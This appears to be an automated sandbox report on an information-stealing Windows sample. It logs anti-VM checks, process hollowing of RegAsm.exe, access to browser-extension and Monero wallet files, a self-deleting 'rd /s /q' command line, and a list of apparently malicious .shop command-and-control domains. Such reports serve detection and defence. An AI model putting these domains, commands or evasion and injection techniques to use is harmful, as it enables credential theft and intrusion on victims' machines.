Source: C:\ProgramData\BAAEHDBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a05570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a05570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7516, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL10:19:5210:19:5210:19:5210:19:5210:19:5210:19:52DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory allocated: 2F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory allocated: 3170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Window / User API: threadDelayed 495

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 9.2 %

Source: C:\Users\user\Desktop\file.exe TID: 7500	Thread sleep count: 495 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe TID: 8172	Thread sleep count: 205 > 30	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe TID: 8172	Thread sleep count: 294 > 30	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6848	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6940	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5592	Thread sleep count: 90 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415395 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415395
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414C20 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415F2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415F2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415A63 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415A63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041509A GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_0041509A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.0000000001295000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-56448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-56464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-57789

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_0043F5F0 LdrInitializeThunk,

9_2_0043F5F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D8EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0041D8EC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004188A9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004184F3 mov eax, dword ptr fs:[00000030h]	3_2_004184F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004184F2 mov eax, dword ptr fs:[00000030h]	3_2_004184F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D8EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D8EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042758E SetUnhandledExceptionFilter,	3_2_0042758E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CF6E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041CF6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C21AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C21AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7516, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02A0212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02A0212D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: carrtychaintnyw.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: quotamkdsdqo.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: milldymarskwom.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: metallygaricwo.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: opponnentduei.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: puredoffustow.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: achievenmtynwjq.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chickerkuso.shop
Source: BAAEHDBFID.exe, 00000007.00000002.2337729902.0000000004175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: questionmwq.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 66F000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FA5008	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FAC008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BAAEHDBFID.exe "C:\ProgramData\BAAEHDBFID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HDAFIIDAKJDG" & exit	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C264760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

3_2_6C264760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B02C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B121
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_004299B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00425343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B3F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_004273FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429CCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E4CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_004274D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B4B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428D24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B583
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E604

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\BAAEHDBFID.exe	Queries volume information: C:\ProgramData\BAAEHDBFID.exe VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C042 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

3_2_0041C042

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

